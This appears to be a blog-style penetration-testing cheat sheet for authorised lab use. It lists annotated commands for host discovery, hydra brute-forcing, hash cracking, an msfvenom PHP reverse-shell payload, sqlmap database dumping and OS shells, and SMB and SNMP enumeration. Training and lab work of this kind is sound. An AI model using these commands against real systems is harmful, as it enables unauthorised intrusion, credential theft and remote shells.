The following is a list of useful command line tools that I’ve begun to use for simple penetration testing. IMPORTANT: Please read the notes in italics below before proceeding.
Before using any of these tools you should ensure that you have explicit permission to do so. I ONLY use these tools on my own air gapped network or against challenge sites (such as Hack The Box) where I am an authorised user. Using these tools against targets for which you DO NOT have explicit permission almost certainly constitutes an offence under the Computer Misuse Act 1990 (UK) . There is simply no excuse for doing so when legitimate penetration testing and coding sites are available, many of which are free. Don’t waste your life and prospects on cyber crime – you will eventually make a mistake and get caught, no matter how good you think you are. Remember if you have services hosted by a third party then you DO NOT have explicit permission to use these tools against your services without the consent of the host.
Some people believe that these techniques should not be published as it makes things easier for wannabe cyber criminals. The fact is that unless there is a global initiative to censor such material from the internet, this is simply not practical. Nothing I have published below is a secret: all of these tools have been around for a while and searching for any one of them will return pages and pages of instruction. The legitimate purpose of these tools is to test systems for vulnerabilities so that they can be target hardened against criminals – and that is the context in which I produce them below. If you are concerned about the vulnerability of your systems to any of these tools, then you should consider employing a qualified penetration tester to provide you with an analysis and recommendations of how you can improve your security.
If you already know that you have vulnerabilities in your systems, you should fix those before employing a penetration tester. Most basic systems can be secured by good cyber awareness and discipline, patch management and up to date anti-malware suites.
ARP – Address Resolution Protocol
Maps IP addresses to MAC addresses
Identifies hosts on a network
arp-scan 192.168.3.0/24 192.168.45.0/24 #identifies hosts on the 192.168.3 and 192.168.45 ranges
Brute Force Tools
Versatile brute force tool for many services
hydra -l root -P /path/dictionary.txt mysql://192.168.3.100 #Brute force mysql user root on target using dictionary passwords hydra -l postgres -P /path/dict.txt postgres://192.168.3.100 #Brute force postgres user on target for using passwords from dict.txt hydra -l bob -P /path/dict.txt -s 22 192.168.3.100 -t4 ssh #Brute force ssh service for user bob on port 22 using passwords from dict.txt
Tools for locating hidden/unknown files and directories
python3 dirsearch.py -u http://10.10.10.28 -e php #Scans for common directory names
gobuster dir -u http://10.10.10.29/ -w /usr/share/wordlists/dirb/common.txt #scans target for directories in the wordlist common.txt gobuster dir -u http://10.10.10.191 -w dir.txt -x txt -b 403,404 --wildcard #scans target for directories and txt files using wildcard, excluding 403 and 404 http errors from output.
hash-identifier #Prompts for hash then identifies possible algorithm #Always internet search hashes before resorting to cracking
Offline brute force tools and utilities
Spider that creates a wordlist based on a website
cewl -d 2 -m 5 -w wordlist.txt https://example.com #generates wordlist.txt by spidering example.com to a depth of two minimum word length 5
Offline hash cracking tool
hashcat -m0 -a0 hashlist.txt /path/dict.txt --quiet #Use dict.txt to attack hashlist.txt (a0) as MD5 (m0) #Always internet search hashes before resorting to cracking
Versatile offline cracking tool
# john stores already cracked passwords. Use --show to display or --pot=file to override #password_hashes in this instance is derived from unshadow #hashes_win7 is a Windows hashdump (eg from Metasploit) john --single password_hashes #Mangles user data and compares hashes looking for matches john -w=/path/dict.txt password_hashes #Runs a dictionary attack against password_hashes using dict.txt john --format=NT --wordlist=/path/dict.txt hashes_win7 #Runs a dictionary attack against Windows hashdump using dict.txt #Always internet search hashes before resorting to cracking
creates suitable john compatible files from Linux data
#Requires Linux /etc/passwd and /etc/shadow files unshadow passwd shadow > password_hashes #unshadows passwd/shadow files and provides list of hashes compatible with john
extracts hashes from protected zip files
zip2john backup.zip > hash #extracts password hash from password protected zip #Always internet search hashes before resorting to cracking
Companion payload generator for the Metasploit Framework
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -o phone_home.php #Generates a php payload to call back to LHOST on port 4444 and spawn meterpreter shell . Create listener in MSFConsole. Upload the payload to target, then navigate to the payload file in browser.
Highly versatile port scanning tool with added functionality in the form of the scripting engine, which additionally reports vulnerabilities.
nmap -sS -sV -nvv -O 192.168.3.0/24 -oA tcp_result #perform 1/2 connect TCP scan; check service; DNS resolution OFF, verbosity medium; detect OS; on range 192.168.3.0; output in all 3 formats, file prefix tcp_result nmap -sU -F -nvv 192.168.3.0/24 192.168.45.0 -oA udp_result #UDP scan; Fast (top 100); medium verbosity; target ranges; output in all 3 formats, file prefix udp_result nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$// #full scan, returns only open port numbers . This is useful for Hack The Box when set to a variable which is rescanned, as the return is nicely formatted and uncluttered. ports=$(above nmap command to return ports only) nmap -sC -sV -p$ports 10.10.10.27 #Scan focused on known open ports grep --color 22/open/tcp *.gnmap #search nmap results for open port 22 (SSH)
SNMP – Simple Network Management Protocol
- Default port – 161.
- Versions 1 and 2c offer no authentication or encryption.
- Default community strings: public, private
grep --color 161/open/udp *.gnmap #Searches all gnmap files and highlights pattern 161/open/udp #ie searches nmap scans for default SNMP ports
nmap scripting engine
nmap -sU -nvv -p161 --script snmp-brute 192.168.3.100 --script-args snmp-brute.communinitiesdb=/path/dictionary.txt #run the snmp-brute script vs target using dictionary communities #The results can be searched for useful information such as usernames
Tool that can be used to brute force community strings.
onesixtyone -c /path/dictionary.txt 192.168.3.100 #Scan target for community strings found in dictionary file
Enumerates snmp community strings.
snmpwalk -v 1 -c community 192.168.3.100 #use SNMP version1 and scan community named community on target
SQL – Structured Query Language
There are several deployments of SQL, such as MySQL, Postgresql and MSSQL each with different default ports and credentials.
Used to establish remote connection to MSSQL server
mssqlclient.py ARCHETYPEemail@example.com -windows-auth #establishes remote connection to MSSQL server where ARCHETYPE/sql_svc is the user
Tool for detecting vulnerability in sql deployments, and can be used to automate SQL Injection. Where the database is accessible in a web application, the Referrer URL and Cookie should be captured using Burp Suite or HTTP Tracker, eg:
Cookie: security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989
sqlmap -d postgres://user:firstname.lastname@example.org:5432/postgres --os-shell #Use database postgres using the postgres service of user/password on port 5432 to spawn shell. (Credentialled) sqlmap -u "http://10.10.10.46/dashboard.php?search=a" --cookie="PHPSESSID=cookie" --os-shell #Attempts to brute force a shell sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -b --current-db --current-user #Assesses vulnerability and provides current database name and user sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" --string="Surname" --users --password #Extracts database management system users and passwords (hashes) sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -U only_me --privileges #List privileges of a specified database management system user (only_me) sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" --dbs #Obtain a list of all databases sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -D noobot --tables #Obtain a list of tables in specified database (noobot) sqlmap -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -D noobot -T users --columns #Obtain list of columns in specified table (users) in specified database (noobot) sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -D noobot -T users -C user,password --dump #Dump contents of specified columns (user, password) from specified table (users) from specified database (noobot)
Web Ap Scanners
nikto -host http://192.168.56.101/noobot #Provides scan that includes references to Open Source Vulnerability Database (OSVDB)
- Default ports: 135 (RPC), 137 (NetBIOS Browser), 139 (NetBIOS (deprecated), 445 (SMB)
- RIDs: 500 (Administrator), 501 (Guest), 502 (Krbtgt (Kerberos)), 1000+ Users
- Common techniques for Windows enumeration are Null Session and RID recycling using enum4linux -r
enum4linux -a 192.168.3.11 #Can identify workgroups, domains (and controllers) enum4linux -a -u user -p password -R 1100-1200 192.168.3.11 #Credentialled RID scan in range 1100-1200
net (credentialled Windows)
Display group membership information
net group "Domain Admins" /domain #Identifies Domain Admin accounts
SMB enumeration and share mounting
smbclient -N -L \\\\10.10.10.27\\ #List available shares (look for those which are not $) smbclient -N \\\\10.10.10.27\\backups #Attempts to connect to share "backups" - if successful results in smb prompt from which commands get AND dir work
Popular site host; manual enumeration to recover /blog path and /readme.html which provides version.
WordPress enumeration tool.
wpscan --url http://192.168.3.110/blog/ #Enumerates for Metasploit vulnerabilities